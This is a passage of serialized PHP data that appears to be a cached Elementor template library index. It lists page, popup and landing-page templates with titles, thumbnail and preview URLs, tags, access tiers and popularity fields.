Involvement\";s:4:\"tags\";s:49:\"[\"Adoption\",\"Involvement\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:184;a:21:{s:4:\"tmpl\";i:1233;s:2:\"id\";i:21205;s:5:\"title\";s:29:\"Photographer &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/25-Projects-Photographer.jpg\";s:12:\"tmpl_created\";i:1638818372;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photographer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Black and white\",\"Photography\",\"Project\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:185;a:21:{s:4:\"tmpl\";i:993;s:2:\"id\";i:13422;s:5:\"title\";s:30:\"Classic | Menu | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1587474782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-menu-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:516;s:11:\"trend_index\";i:432;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:186;a:21:{s:4:\"tmpl\";i:925;s:2:\"id\";i:12540;s:5:\"title\";s:33:\"Classic | Menu | Travel and tours\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_Menu_s.png\";s:12:\"tmpl_created\";i:1575960267;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-menu-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:690;s:11:\"trend_index\";i:714;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:187;a:21:{s:4:\"tmpl\";i:1208;s:2:\"id\";i:20361;s:5:\"title\";s:51:\"Exercise &#038; Fitness Equipment &#8211; eCommerce\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2021/10/Exercise-Fitness-Equipment-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633883766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/exercise-fitness-equipment-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Fitness\",\"Health\",\"Landing Pages\",\"Online Shop\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:188;a:21:{s:4:\"tmpl\";i:1239;s:2:\"id\";i:21373;s:5:\"title\";s:28:\"Photographer &#8211; Gallery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/18-Gallery-Photographer.jpg\";s:12:\"tmpl_created\";i:1638821177;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/photographer-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Gallery\",\"Photography\",\"Portfolio\",\"Project\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:189;a:21:{s:4:\"tmpl\";i:1426;s:2:\"id\";i:24348;s:5:\"title\";s:24:\"Wireframe &#8211; Home 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-2.jpg\";s:12:\"tmpl_created\";i:1653988444;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:190;a:21:{s:4:\"tmpl\";i:958;s:2:\"id\";i:13129;s:5:\"title\";s:28:\"Classic | Menu | Photography\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/PopUp_s.png\";s:12:\"tmpl_created\";i:1582092645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-menu-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:646;s:11:\"trend_index\";i:521;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:191;a:21:{s:4:\"tmpl\";i:1427;s:2:\"id\";i:24366;s:5:\"title\";s:24:\"Wireframe &#8211; Home 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-3.jpg\";s:12:\"tmpl_created\";i:1653988491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:192;a:21:{s:4:\"tmpl\";i:1207;s:2:\"id\";i:20299;s:5:\"title\";s:51:\"Interior Design Consultation &#8211; Online Service\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/10/Interior-Design-Consultation-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/interior-design-consultation-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:65:\"[\"Consulting\",\"Interior Design\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:193;a:21:{s:4:\"tmpl\";i:952;s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:357;s:11:\"trend_index\";i:281;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:194;a:21:{s:4:\"tmpl\";i:883;s:2:\"id\";i:11468;s:5:\"title\";s:20:\"Classic | Sale | Gym\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/PopUp_Small.png\";s:12:\"tmpl_created\";i:1567393182;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-sale-gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:696;s:11:\"trend_index\";i:740;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:195;a:21:{s:4:\"tmpl\";i:1216;s:2:\"id\";i:20623;s:5:\"title\";s:57:\"Luxurious Camping Accommodation For Events &#8211; Events\";s:9:\"thumbnail\";s:113:\"https://library.elementor.com/wp-content/uploads/2021/10/Luxurious-Camping-Accommodation-For-Events-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634041681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/luxurious-camping-accommodation-for-events-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:43:\"[\"Event\",\"Events\",\"Landing Pages\",\"Travel\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:196;a:21:{s:4:\"tmpl\";i:1219;s:2:\"id\";i:20886;s:5:\"title\";s:28:\"Online Training &#8211; Home\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/12/2-Home-Online-Training.jpg\";s:12:\"tmpl_created\";i:1638784769;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/online-training-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Online\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:197;a:21:{s:4:\"tmpl\";i:1065;s:2:\"id\";i:15570;s:5:\"title\";s:33:\"Classic | Subscribe | Travel Blog\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp.jpg\";s:12:\"tmpl_created\";i:1606215555;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscribe-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:709;s:11:\"trend_index\";i:459;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:198;a:21:{s:4:\"tmpl\";i:1431;s:2:\"id\";i:24437;s:5:\"title\";s:25:\"Wireframe &#8211; About 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-4.jpg\";s:12:\"tmpl_created\";i:1653988733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:199;a:21:{s:4:\"tmpl\";i:1210;s:2:\"id\";i:20414;s:5:\"title\";s:45:\"Online English Courses &#8211; Online Service\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Online-English-Courses-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/online-english-courses-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Course Online\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:200;a:21:{s:4:\"tmpl\";i:1132;s:2:\"id\";i:16553;s:5:\"title\";s:31:\"Fly-In | Contact | Beauty Salon\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/12/PopUp.jpg\";s:12:\"tmpl_created\";i:1608622602;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-contact-beauty-salon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:691;s:11:\"trend_index\";i:428;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:201;a:21:{s:4:\"tmpl\";i:1441;s:2:\"id\";i:24574;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 5\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-5.jpg\";s:12:\"tmpl_created\";i:1653989135;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:202;a:21:{s:4:\"tmpl\";i:1217;s:2:\"id\";i:20333;s:5:\"title\";s:40:\"Plant Pots Online Shop &#8211; eCommerce\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Plant-Pots-Online-Shop-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634042184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/plant-pots-online-shop-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Ecommerce\",\"Landing Pages\",\"Online Shop\",\"Shop\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:203;a:21:{s:4:\"tmpl\";i:1211;s:2:\"id\";i:20447;s:5:\"title\";s:33:\"Shared Workspace &#8211; Business\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Shared-Workspace.jpg\";s:12:\"tmpl_created\";i:1633884934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/shared-workspace-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:28:\"[\"Business\",\"Landing Pages\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:204;a:21:{s:4:\"tmpl\";i:1237;s:2:\"id\";i:21313;s:5:\"title\";s:34:\"Spa &#038; Beauty &#8211; Services\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/12/Spa-Beauty-Treatments-page-1.jpg\";s:12:\"tmpl_created\";i:1638819709;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/spa-beauty-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:55:\"[\"Beauty\",\"Hair\",\"Health\",\"Services\",\"Spa\",\"Treatment\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:205;a:21:{s:4:\"tmpl\";i:1004;s:2:\"id\";i:13538;s:5:\"title\";s:32:\"Fly-In | Newsletter | Barbershop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/05/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1589893364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-newsletter-barbershop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:710;s:11:\"trend_index\";i:667;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:206;a:21:{s:4:\"tmpl\";i:924;s:2:\"id\";i:12550;s:5:\"title\";s:32:\"Fly-in | Sale | Travel and Tours\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_s.png\";s:12:\"tmpl_created\";i:1575960263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/flyin-sale-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:754;s:11:\"trend_index\";i:791;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:207;a:21:{s:4:\"tmpl\";i:1212;s:2:\"id\";i:20479;s:5:\"title\";s:49:\"Teeth Straightening &#8211; Health &#038; Fitness\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Teeth-Whitening.jpg\";s:12:\"tmpl_created\";i:1633886115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/teeth-straightening-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:46:\"[\"Business\",\"Dental\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:208;a:21:{s:4:\"tmpl\";i:1234;s:2:\"id\";i:21234;s:5:\"title\";s:34:\"Insurance Company &#8211; Services\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/15-Services-Insurance-Company.jpg\";s:12:\"tmpl_created\";i:1638818688;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/insurance-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Faq\",\"Form\",\"Insurance\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:209;a:21:{s:4:\"tmpl\";i:1035;s:2:\"id\";i:15062;s:5:\"title\";s:35:\"Fly-In | Sign up | Flooring Company\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp.png\";s:12:\"tmpl_created\";i:1597739629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/fly-in-sign-up-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring 